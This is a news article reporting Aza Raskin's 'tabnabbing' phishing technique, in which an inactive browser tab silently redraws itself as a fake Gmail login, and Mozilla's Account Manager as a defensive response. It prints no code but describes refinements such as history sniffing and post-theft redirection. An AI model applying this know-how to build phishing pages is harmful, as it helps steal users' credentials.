14 DAY TRIAL // Mozilla's Creative Lead for Firefox, Aza Raskin, has devised a new phishing method that capitalizes on users' lack of attention to the order and content of their browser's tabs. Called "tabnabbing," the attack uses JavaScript to alter the content of a page opened in a browser tab, when the user moves away from it.
"Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site. What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. That’ll catch us by surprise," Mr. Raskin, explains on his blog.
The attack proposed by the design expert has a Web page detect when the user changes focus from it and deceptively change its appearance. The booby-trapped page doesn't even have to be a rogue one. It can be part of a legit website that has been compromised via a technique that allows code injection.
In order to achieve the best result, attackers can go as far as silently replacing the favicon and title the tab displays. Raskin's proof-of-concept, which he integrated into the blog post describing the new phishing method, has the page imitate the Gmail login page if more than five seconds are spent on a different tab. In this way, a user returning to the original tab at a later time could be tricked into thinking that they were logged out of their mailbox and attempt to authenticate again.
There are also other social engineering tricks or hacks that can be employed to increase this attack's success rate and overall efficiency. For example, phishers can make the attack more user-specific by employing the CSS history hack to determine what sensitive websites someone has recently visited and imitate those.
Raskin points out that there are also various methods to determine if a user is logged into a specific service that can then be targeted. Furthermore, if they then try to authenticate via the fake login form, the page can take them to the real site, where they will be automatically logged in because of their already active session.
Some people might ask why is Mozilla's Creative Lead describing new phishing methods on his blog? Well, apparently in order to outline the need of an easier and more secure approach to online authentication. In this respect, Mozilla is developing a new browser feature and protocol specification called the Account Manager, which will allow users to see their connection state and authenticate on their favorite websites from a common interface.